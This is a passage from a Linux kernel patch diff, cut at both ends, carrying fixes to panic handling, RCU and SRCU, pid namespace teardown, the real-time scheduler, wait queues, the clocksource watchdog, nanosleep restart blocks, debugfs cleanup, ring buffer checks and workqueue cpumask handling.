+  *	@fmt: The text string to print
+@@ -332,23 +354,10 @@ void panic(const char *fmt, ...)
+ 	 *
+ 	 * Bypass the panic_cpu check and call __crash_kexec directly.
+ 	 */
+-	if (!_crash_kexec_post_notifiers) {
++	if (!_crash_kexec_post_notifiers)
+ 		__crash_kexec(NULL);
+ 
+-		/*
+-		 * Note smp_send_stop is the usual smp shutdown function, which
+-		 * unfortunately means it may not be hardened to work in a
+-		 * panic situation.
+-		 */
+-		smp_send_stop();
+-	} else {
+-		/*
+-		 * If we want to do crash dump after notifier calls and
+-		 * kmsg_dump, we will need architecture dependent extra
+-		 * works in addition to stopping other CPUs.
+-		 */
+-		crash_smp_send_stop();
+-	}
++	panic_other_cpus_shutdown(_crash_kexec_post_notifiers);
+ 
+ 	/*
+ 	 * Run any panic handlers, including those that might need to
+@@ -678,6 +687,7 @@ void __warn(const char *file, int line, void *caller, unsigned taint,
+ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 		       const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	struct warn_args args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -692,11 +702,13 @@ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 	va_start(args.args, fmt);
+ 	__warn(file, line, __builtin_return_address(0), taint, NULL, &args);
+ 	va_end(args.args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(warn_slowpath_fmt);
+ #else
+ void __warn_printk(const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	va_list args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -704,6 +716,7 @@ void __warn_printk(const char *fmt, ...)
+ 	va_start(args, fmt);
+ 	vprintk(fmt, args);
+ 	va_end(args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(__warn_printk);
+ #endif
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index f4f8cb0435b45..fc21c5d5fd5de 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -244,7 +244,24 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		if (pid_ns->pid_allocated == init_pids)
+ 			break;
++		/*
++		 * Release tasks_rcu_exit_srcu to avoid following deadlock:
++		 *
++		 * 1) TASK A unshare(CLONE_NEWPID)
++		 * 2) TASK A fork() twice -> TASK B (child reaper for new ns)
++		 *    and TASK C
++		 * 3) TASK B exits, kills TASK C, waits for TASK A to reap it
++		 * 4) TASK A calls synchronize_rcu_tasks()
++		 *                   -> synchronize_srcu(tasks_rcu_exit_srcu)
++		 * 5) *DEADLOCK*
++		 *
++		 * It is considered safe to release tasks_rcu_exit_srcu here
++		 * because we assume the current task cannot be concurrently
++		 * reaped at this point.
++		 */
++		exit_tasks_rcu_stop();
+ 		schedule();
++		exit_tasks_rcu_start();
+ 	}
+ 	__set_current_state(TASK_RUNNING);
+ 
+diff --git a/kernel/power/energy_model.c b/kernel/power/energy_model.c
+index f82111837b8d1..7b44f5b89fa15 100644
+--- a/kernel/power/energy_model.c
++++ b/kernel/power/energy_model.c
+@@ -87,10 +87,7 @@ static void em_debug_create_pd(struct device *dev)
+ 
+ static void em_debug_remove_pd(struct device *dev)
+ {
+-	struct dentry *debug_dir;
+-
+-	debug_dir = debugfs_lookup(dev_name(dev), rootdir);
+-	debugfs_remove_recursive(debug_dir);
++	debugfs_lookup_and_remove(dev_name(dev), rootdir);
+ }
+ 
+ static int __init em_debug_init(void)
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index 1c304fec89c02..4db36d543be37 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -663,7 +663,7 @@ static void srcu_gp_start(struct srcu_struct *ssp)
+ 	int state;
+ 
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = this_cpu_ptr(ssp->sda);
+ 	lockdep_assert_held(&ACCESS_PRIVATE(ssp, lock));
+@@ -774,7 +774,8 @@ static void srcu_gp_end(struct srcu_struct *ssp)
+ 	/* Initiate callback invocation as needed. */
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_BARRIER) {
+-		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, 0), cbdelay);
++		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, get_boot_cpu_id()),
++					cbdelay);
+ 	} else {
+ 		idx = rcu_seq_ctr(gpseq) % ARRAY_SIZE(snp->srcu_have_cbs);
+ 		srcu_for_each_node_breadth_first(ssp, snp) {
+@@ -1093,7 +1094,7 @@ static unsigned long srcu_gp_start_if_needed(struct srcu_struct *ssp,
+ 	idx = srcu_read_lock(ssp);
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_CALL)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = raw_cpu_ptr(ssp->sda);
+ 	spin_lock_irqsave_sdp_contention(sdp, &flags);
+@@ -1429,7 +1430,7 @@ void srcu_barrier(struct srcu_struct *ssp)
+ 
+ 	idx = srcu_read_lock(ssp);
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, 0));
++		srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, get_boot_cpu_id()));
+ 	else
+ 		for_each_possible_cpu(cpu)
+ 			srcu_barrier_one_cpu(ssp, per_cpu_ptr(ssp->sda, cpu));
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index f5bf6fb430dab..c8409601fec38 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -384,6 +384,7 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ {
+ 	int cpu;
+ 	unsigned long flags;
++	bool gpdone = poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq);
+ 	long n;
+ 	long ncbs = 0;
+ 	long ncbsnz = 0;
+@@ -425,21 +426,23 @@ static int rcu_tasks_need_gpcb(struct rcu_tasks *rtp)
+ 			WRITE_ONCE(rtp->percpu_enqueue_shift, order_base_2(nr_cpu_ids));
+ 			smp_store_release(&rtp->percpu_enqueue_lim, 1);
+ 			rtp->percpu_dequeue_gpseq = get_state_synchronize_rcu();
++			gpdone = false;
+ 			pr_info("Starting switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+-	if (rcu_task_cb_adjust && !ncbsnz &&
+-	    poll_state_synchronize_rcu(rtp->percpu_dequeue_gpseq)) {
++	if (rcu_task_cb_adjust && !ncbsnz && gpdone) {
+ 		raw_spin_lock_irqsave(&rtp->cbs_gbl_lock, flags);
+ 		if (rtp->percpu_enqueue_lim < rtp->percpu_dequeue_lim) {
+ 			WRITE_ONCE(rtp->percpu_dequeue_lim, 1);
+ 			pr_info("Completing switch %s to CPU-0 callback queuing.\n", rtp->name);
+ 		}
+-		for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
+-			struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
++		if (rtp->percpu_dequeue_lim == 1) {
++			for (cpu = rtp->percpu_dequeue_lim; cpu < nr_cpu_ids; cpu++) {
++				struct rcu_tasks_percpu *rtpcp = per_cpu_ptr(rtp->rtpcpu, cpu);
+ 
+-			WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++				WARN_ON_ONCE(rcu_segcblist_n_cbs(&rtpcp->cblist));
++			}
+ 		}
+ 		raw_spin_unlock_irqrestore(&rtp->cbs_gbl_lock, flags);
+ 	}
+@@ -560,8 +563,9 @@ static int __noreturn rcu_tasks_kthread(void *arg)
+ static void synchronize_rcu_tasks_generic(struct rcu_tasks *rtp)
+ {
+ 	/* Complain if the scheduler has not started.  */
+-	WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
+-			 "synchronize_rcu_tasks called too soon");
++	if (WARN_ONCE(rcu_scheduler_active == RCU_SCHEDULER_INACTIVE,
++			 "synchronize_%s() called too soon", rtp->name))
++		return;
+ 
+ 	// If the grace-period kthread is running, use it.
+ 	if (READ_ONCE(rtp->kthread_ptr)) {
+@@ -827,11 +831,21 @@ static void rcu_tasks_pertask(struct task_struct *t, struct list_head *hop)
+ static void rcu_tasks_postscan(struct list_head *hop)
+ {
+ 	/*
+-	 * Wait for tasks that are in the process of exiting.  This
+-	 * does only part of the job, ensuring that all tasks that were
+-	 * previously exiting reach the point where they have disabled
+-	 * preemption, allowing the later synchronize_rcu() to finish
+-	 * the job.
++	 * Exiting tasks may escape the tasklist scan. Those are vulnerable
++	 * until their final schedule() with TASK_DEAD state. To cope with
++	 * this, divide the fragile part of the exit path into two
++	 * intersecting read-side critical sections:
++	 *
++	 * 1) An _SRCU_ read side starting before calling exit_notify(),
++	 *    which may remove the task from the tasklist, and ending after
++	 *    the final preempt_disable() call in do_exit().
++	 *
++	 * 2) An _RCU_ read side starting with the final preempt_disable()
++	 *    call in do_exit() and ending with the final call to schedule()
++	 *    with TASK_DEAD state.
++	 *
++	 * This handles part 1). The postgp step will handle part 2)
++	 * with a call to synchronize_rcu().
+ 	 */
+ 	synchronize_srcu(&tasks_rcu_exit_srcu);
+ }
+@@ -898,7 +912,10 @@ static void rcu_tasks_postgp(struct rcu_tasks *rtp)
+ 	 *
+ 	 * In addition, this synchronize_rcu() waits for exiting tasks
+ 	 * to complete their final preempt_disable() region of execution,
+-	 * cleaning up after the synchronize_srcu() above.
++	 * cleaning up after synchronize_srcu(&tasks_rcu_exit_srcu),
++	 * ensuring that the whole region, from before tasklist removal
++	 * until the final schedule() with TASK_DEAD state, is an RCU
++	 * Tasks read-side critical section.
+ 	 */
+ 	synchronize_rcu();
+ }
+@@ -988,27 +1005,42 @@ void show_rcu_tasks_classic_gp_kthread(void)
+ EXPORT_SYMBOL_GPL(show_rcu_tasks_classic_gp_kthread);
+ #endif // !defined(CONFIG_TINY_RCU)
+ 
+-/* Do the srcu_read_lock() for the above synchronize_srcu().  */
++/*
++ * Help protect against the tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
+ void exit_tasks_rcu_start(void) __acquires(&tasks_rcu_exit_srcu)
+ {
+-	preempt_disable();
+ 	current->rcu_tasks_idx = __srcu_read_lock(&tasks_rcu_exit_srcu);
+-	preempt_enable();
+ }
+ 
+-/* Do the srcu_read_unlock() for the above synchronize_srcu().  */
+-void exit_tasks_rcu_finish(void) __releases(&tasks_rcu_exit_srcu)
++/*
++ * Help protect against the tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_stop(void) __releases(&tasks_rcu_exit_srcu)
+ {
+ 	struct task_struct *t = current;
+ 
+-	preempt_disable();
+ 	__srcu_read_unlock(&tasks_rcu_exit_srcu, t->rcu_tasks_idx);
+-	preempt_enable();
+-	exit_tasks_rcu_finish_trace(t);
++}
++
++/*
++ * Help protect against the tasklist scan blind spot while the
++ * task is exiting and may be removed from the tasklist. See
++ * corresponding synchronize_srcu() for further details.
++ */
++void exit_tasks_rcu_finish(void)
++{
++	exit_tasks_rcu_stop();
++	exit_tasks_rcu_finish_trace(current);
+ }
+ 
+ #else /* #ifdef CONFIG_TASKS_RCU */
+ void exit_tasks_rcu_start(void) { }
++void exit_tasks_rcu_stop(void) { }
+ void exit_tasks_rcu_finish(void) { exit_tasks_rcu_finish_trace(current); }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU */
+ 
+@@ -1036,9 +1068,6 @@ static void rcu_tasks_be_rude(struct work_struct *work)
+ // Wait for one rude RCU-tasks grace period.
+ static void rcu_tasks_rude_wait_gp(struct rcu_tasks *rtp)
+ {
+-	if (num_online_cpus() <= 1)
+-		return;	// Fastpath for only one CPU.
+-
+ 	rtp->n_ipis += cpumask_weight(cpu_online_mask);
+ 	schedule_on_each_cpu(rcu_tasks_be_rude);
+ }
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index 18e9b4cd78ef8..60732264a7d0b 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -667,7 +667,9 @@ static void synchronize_rcu_expedited_wait(void)
+ 				mask = leaf_node_cpu_bit(rnp, cpu);
+ 				if (!(READ_ONCE(rnp->expmask) & mask))
+ 					continue;
++				preempt_disable(); // For smp_processor_id() in dump_cpu_task().
+ 				dump_cpu_task(cpu);
++				preempt_enable();
+ 			}
+ 		}
+ 		jiffies_stall = 3 * rcu_exp_jiffies_till_stall_check() + 3;
+diff --git a/kernel/resource.c b/kernel/resource.c
+index 4c5e80b92f2f4..1aeeededdd4c8 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1345,20 +1345,6 @@ retry:
+ 			continue;
+ 		}
+ 
+-		/*
+-		 * All memory regions added from memory-hotplug path have the
+-		 * flag IORESOURCE_SYSTEM_RAM. If the resource does not have
+-		 * this flag, we know that we are dealing with a resource coming
+-		 * from HMM/devm. HMM/devm use another mechanism to add/release
+-		 * a resource. This goes via devm_request_mem_region and
+-		 * devm_release_mem_region.
+-		 * HMM/devm take care to release their resources when they want,
+-		 * so if we are dealing with them, let us just back off here.
+-		 */
+-		if (!(res->flags & IORESOURCE_SYSRAM)) {
+-			break;
+-		}
+-
+ 		if (!(res->flags & IORESOURCE_MEM))
+ 			break;
+ 
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index ed2a47e4ddaec..0a11f44adee57 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -1777,6 +1777,8 @@ static struct sched_rt_entity *pick_next_rt_entity(struct rt_rq *rt_rq)
+ 	BUG_ON(idx >= MAX_RT_PRIO);
+ 
+ 	queue = array->queue + idx;
++	if (SCHED_WARN_ON(list_empty(queue)))
++		return NULL;
+ 	next = list_entry(queue->next, struct sched_rt_entity, run_list);
+ 
+ 	return next;
+@@ -1789,7 +1791,8 @@ static struct task_struct *_pick_next_task_rt(struct rq *rq)
+ 
+ 	do {
+ 		rt_se = pick_next_rt_entity(rt_rq);
+-		BUG_ON(!rt_se);
++		if (unlikely(!rt_se))
++			return NULL;
+ 		rt_rq = group_rt_rq(rt_se);
+ 	} while (rt_rq);
+ 
+diff --git a/kernel/sched/wait.c b/kernel/sched/wait.c
+index 9860bb9a847cf..133b74730738b 100644
+--- a/kernel/sched/wait.c
++++ b/kernel/sched/wait.c
+@@ -121,11 +121,12 @@ static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode,
+ 	return nr_exclusive;
+ }
+ 
+-static void __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int mode,
++static int __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int mode,
+ 			int nr_exclusive, int wake_flags, void *key)
+ {
+ 	unsigned long flags;
+ 	wait_queue_entry_t bookmark;
++	int remaining = nr_exclusive;
+ 
+ 	bookmark.flags = 0;
+ 	bookmark.private = NULL;
+@@ -134,10 +135,12 @@ static void __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int
+ 
+ 	do {
+ 		spin_lock_irqsave(&wq_head->lock, flags);
+-		nr_exclusive = __wake_up_common(wq_head, mode, nr_exclusive,
++		remaining = __wake_up_common(wq_head, mode, remaining,
+ 						wake_flags, key, &bookmark);
+ 		spin_unlock_irqrestore(&wq_head->lock, flags);
+ 	} while (bookmark.flags & WQ_FLAG_BOOKMARK);
++
++	return nr_exclusive - remaining;
+ }
+ 
+ /**
+@@ -147,13 +150,14 @@ static void __wake_up_common_lock(struct wait_queue_head *wq_head, unsigned int
+  * @nr_exclusive: how many wake-one or wake-many threads to wake up
+  * @key: is directly passed to the wakeup function
+  *
+- * If this function wakes up a task, it executes a full memory barrier before
+- * accessing the task state.
++ * If this function wakes up a task, it executes a full memory barrier
++ * before accessing the task state.  Returns the number of exclusive
++ * tasks that were awakened.
+  */
+-void __wake_up(struct wait_queue_head *wq_head, unsigned int mode,
+-			int nr_exclusive, void *key)
++int __wake_up(struct wait_queue_head *wq_head, unsigned int mode,
++	      int nr_exclusive, void *key)
+ {
+-	__wake_up_common_lock(wq_head, mode, nr_exclusive, 0, key);
++	return __wake_up_common_lock(wq_head, mode, nr_exclusive, 0, key);
+ }
+ EXPORT_SYMBOL(__wake_up);
+ 
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index 8058bec87acee..1c90e710d537f 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -384,6 +384,15 @@ void clocksource_verify_percpu(struct clocksource *cs)
+ }
+ EXPORT_SYMBOL_GPL(clocksource_verify_percpu);
+ 
++static inline void clocksource_reset_watchdog(void)
++{
++	struct clocksource *cs;
++
++	list_for_each_entry(cs, &watchdog_list, wd_list)
++		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
++}
++
++
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+ 	u64 csnow, wdnow, cslast, wdlast, delta;
+@@ -391,6 +400,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	int64_t wd_nsec, cs_nsec;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
++	unsigned long extra_wait = 0;
+ 	u32 md;
+ 
+ 	spin_lock(&watchdog_lock);
+@@ -410,13 +420,30 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 
+ 		read_ret = cs_watchdog_read(cs, &csnow, &wdnow);
+ 
+-		if (read_ret != WD_READ_SUCCESS) {
+-			if (read_ret == WD_READ_UNSTABLE)
+-				/* Clock readout unreliable, so give it up. */
+-				__clocksource_unstable(cs);
++		if (read_ret == WD_READ_UNSTABLE) {
++			/* Clock readout unreliable, so give it up. */
++			__clocksource_unstable(cs);
+ 			continue;
+ 		}
+ 
++		/*
++		 * When WD_READ_SKIP is returned, it means the system is likely
++		 * under very heavy load, where the latency of reading the
++		 * watchdog/clocksource is very high and affects the accuracy
++		 * of the watchdog check. So give the system some space and
++		 * suspend the watchdog check for 5 minutes.
++		 */
++		if (read_ret == WD_READ_SKIP) {
++			/*
++			 * As the watchdog timer will be suspended, and
++			 * cs->last could remain unchanged for 5 minutes, reset
++			 * the counters.
++			 */
++			clocksource_reset_watchdog();
++			extra_wait = HZ * 300;
++			break;
++		}
++
+ 		/* Clocksource initialized ? */
+ 		if (!(cs->flags & CLOCK_SOURCE_WATCHDOG) ||
+ 		    atomic_read(&watchdog_reset_pending)) {
+@@ -512,7 +539,7 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 	 * pair clocksource_stop_watchdog() clocksource_start_watchdog().
+ 	 */
+ 	if (!timer_pending(&watchdog_timer)) {
+-		watchdog_timer.expires += WATCHDOG_INTERVAL;
++		watchdog_timer.expires += WATCHDOG_INTERVAL + extra_wait;
+ 		add_timer_on(&watchdog_timer, next_cpu);
+ 	}
+ out:
+@@ -537,14 +564,6 @@ static inline void clocksource_stop_watchdog(void)
+ 	watchdog_running = 0;
+ }
+ 
+-static inline void clocksource_reset_watchdog(void)
+-{
+-	struct clocksource *cs;
+-
+-	list_for_each_entry(cs, &watchdog_list, wd_list)
+-		cs->flags &= ~CLOCK_SOURCE_WATCHDOG;
+-}
+-
+ static void clocksource_resume_watchdog(void)
+ {
+ 	atomic_inc(&watchdog_reset_pending);
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab62603..e4f0e3b0c4f4f 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2126,6 +2126,7 @@ SYSCALL_DEFINE2(nanosleep, struct __kernel_timespec __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+@@ -2147,6 +2148,7 @@ SYSCALL_DEFINE2(nanosleep_time32, struct old_timespec32 __user *, rqtp,
+ 	if (!timespec64_valid(&tu))
+ 		return -EINVAL;
+ 
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	return hrtimer_nanosleep(timespec64_to_ktime(tu), HRTIMER_MODE_REL,
+diff --git a/kernel/time/posix-stubs.c b/kernel/time/posix-stubs.c
+index 90ea5f373e50e..828aeecbd1e8a 100644
+--- a/kernel/time/posix-stubs.c
++++ b/kernel/time/posix-stubs.c
+@@ -147,6 +147,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+@@ -240,6 +241,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 	texp = timespec64_to_ktime(t);
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 5dead89308b74..0c8a87a11b39d 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -1270,6 +1270,7 @@ SYSCALL_DEFINE4(clock_nanosleep, const clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_NATIVE : TT_NONE;
+ 	current->restart_block.nanosleep.rmtp = rmtp;
+ 
+@@ -1297,6 +1298,7 @@ SYSCALL_DEFINE4(clock_nanosleep_time32, clockid_t, which_clock, int, flags,
+ 		return -EINVAL;
+ 	if (flags & TIMER_ABSTIME)
+ 		rmtp = NULL;
++	current->restart_block.fn = do_no_restart_syscall;
+ 	current->restart_block.nanosleep.type = rmtp ? TT_COMPAT : TT_NONE;
+ 	current->restart_block.nanosleep.compat_rmtp = rmtp;
+ 
+diff --git a/kernel/time/test_udelay.c b/kernel/time/test_udelay.c
+index 13b11eb62685e..20d5df631570e 100644
+--- a/kernel/time/test_udelay.c
++++ b/kernel/time/test_udelay.c
+@@ -149,7 +149,7 @@ module_init(udelay_test_init);
+ static void __exit udelay_test_exit(void)
+ {
+ 	mutex_lock(&udelay_test_lock);
+-	debugfs_remove(debugfs_lookup(DEBUGFS_FILENAME, NULL));
++	debugfs_lookup_and_remove(DEBUGFS_FILENAME, NULL);
+ 	mutex_unlock(&udelay_test_lock);
+ }
+ 
+diff --git a/kernel/torture.c b/kernel/torture.c
+index 789aeb0e1159c..9266ca168b8f5 100644
+--- a/kernel/torture.c
++++ b/kernel/torture.c
+@@ -915,7 +915,7 @@ void torture_kthread_stopping(char *title)
+ 	VERBOSE_TOROUT_STRING(buf);
+ 	while (!kthread_should_stop()) {
+ 		torture_shutdown_absorb(title);
+-		schedule_timeout_uninterruptible(1);
++		schedule_timeout_uninterruptible(HZ / 20);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(torture_kthread_stopping);
+diff --git a/kernel/trace/blktrace.c b/kernel/trace/blktrace.c
+index a66cff5a18579..a5b35bcfb0602 100644
+--- a/kernel/trace/blktrace.c
++++ b/kernel/trace/blktrace.c
+@@ -320,8 +320,8 @@ static void blk_trace_free(struct request_queue *q, struct blk_trace *bt)
+ 	 * under 'q->debugfs_dir', thus lookup and remove them.
+ 	 */
+ 	if (!bt->dir) {
+-		debugfs_remove(debugfs_lookup("dropped", q->debugfs_dir));
+-		debugfs_remove(debugfs_lookup("msg", q->debugfs_dir));
++		debugfs_lookup_and_remove("dropped", q->debugfs_dir);
++		debugfs_lookup_and_remove("msg", q->debugfs_dir);
+ 	} else {
+ 		debugfs_remove(bt->dir);
+ 	}
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index b21bf14bae9bd..c35e08b74014f 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1580,19 +1580,6 @@ static int rb_check_bpage(struct ring_buffer_per_cpu *cpu_buffer,
+ 	return 0;
+ }
+ 
+-/**
+- * rb_check_list - make sure a pointer to a list has the last bits zero
+- */
+-static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+-			 struct list_head *list)
+-{
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->prev) != list->prev))
+-		return 1;
+-	if (RB_WARN_ON(cpu_buffer, rb_list_head(list->next) != list->next))
+-		return 1;
+-	return 0;
+-}
+-
+ /**
+  * rb_check_pages - integrity check of buffer pages
+  * @cpu_buffer: CPU buffer with pages to test
+@@ -1602,36 +1589,27 @@ static int rb_check_list(struct ring_buffer_per_cpu *cpu_buffer,
+  */
+ static int rb_check_pages(struct ring_buffer_per_cpu *cpu_buffer)
+ {
+-	struct list_head *head = cpu_buffer->pages;
+-	struct buffer_page *bpage, *tmp;
++	struct list_head *head = rb_list_head(cpu_buffer->pages);
++	struct list_head *tmp;
+ 
+-	/* Reset the head page if it exists */
+-	if (cpu_buffer->head_page)
+-		rb_set_head_page(cpu_buffer);
+-
+-	rb_head_page_deactivate(cpu_buffer);
+-
+-	if (RB_WARN_ON(cpu_buffer, head->next->prev != head))
+-		return -1;
+-	if (RB_WARN_ON(cpu_buffer, head->prev->next != head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->next)->prev) != head))
+ 		return -1;
+ 
+-	if (rb_check_list(cpu_buffer, head))
++	if (RB_WARN_ON(cpu_buffer,
++			rb_list_head(rb_list_head(head->prev)->next) != head))
+ 		return -1;
+ 
+-	list_for_each_entry_safe(bpage, tmp, head, list) {
++	for (tmp = rb_list_head(head->next); tmp != head; tmp = rb_list_head(tmp->next)) {
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.next->prev != &bpage->list))
++				rb_list_head(rb_list_head(tmp->next)->prev) != tmp))
+ 			return -1;
++
+ 		if (RB_WARN_ON(cpu_buffer,
+-			       bpage->list.prev->next != &bpage->list))
+-			return -1;
+-		if (rb_check_list(cpu_buffer, &bpage->list))
++				rb_list_head(rb_list_head(tmp->prev)->next) != tmp))
+ 			return -1;
+ 	}
+ 
+-	rb_head_page_activate(cpu_buffer);
+-
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index a387bdc6af013..f70765780ed3f 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5599,7 +5599,7 @@ static const char readme_msg[] =
+ #ifdef CONFIG_HIST_TRIGGERS
+ 	"\t           s:[synthetic/]<event> <field> [<field>]\n"
+ #endif
+-	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]\n"
++	"\t           e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>] [if <filter>]\n"
+ 	"\t           -:[<group>/][<event>]\n"
+ #ifdef CONFIG_KPROBE_EVENTS
+ 	"\t    place: [<module>:]<symbol>[+<offset>]|<memaddr>\n"
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 7cd5f5e7e0a1b..8e21c352c1558 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -326,7 +326,7 @@ static struct rcuwait manager_wait = __RCUWAIT_INITIALIZER(manager_wait);
+ static LIST_HEAD(workqueues);		/* PR: list of all workqueues */
+ static bool workqueue_freezing;		/* PL: have wqs started freezing? */
+ 
+-/* PL: allowable cpus for unbound wqs and work items */
++/* PL&A: allowable cpus for unbound wqs and work items */
+ static cpumask_var_t wq_unbound_cpumask;
+ 
+ /* CPU where unbound work was last round robin scheduled from this CPU */
+@@ -3952,7 +3952,8 @@ static void apply_wqattrs_cleanup(struct apply_wqattrs_ctx *ctx)
+ /* allocate the attrs and pwqs for later installation */
+ static struct apply_wqattrs_ctx *
+ apply_wqattrs_prepare(struct workqueue_struct *wq,
+-		      const struct workqueue_attrs *attrs)
++		      const struct workqueue_attrs *attrs,
++		      const cpumask_var_t unbound_cpumask)
+ {
+ 	struct apply_wqattrs_ctx *ctx;
+ 	struct workqueue_attrs *new_attrs, *tmp_attrs;
+@@ -3968,14 +3969,15 @@ apply_wqattrs_prepare(struct workqueue_struct *wq,
+ 		goto out_free;
+ 
+ 	/*
+-	 * Calculate the attrs of the default pwq.
++	 * Calculate the attrs of the default pwq with unbound_cpumask,
++	 * which is wq_unbound_cpumask or the new cpumask being applied.
+ 	 * If the user configured cpumask doesn't overlap with the
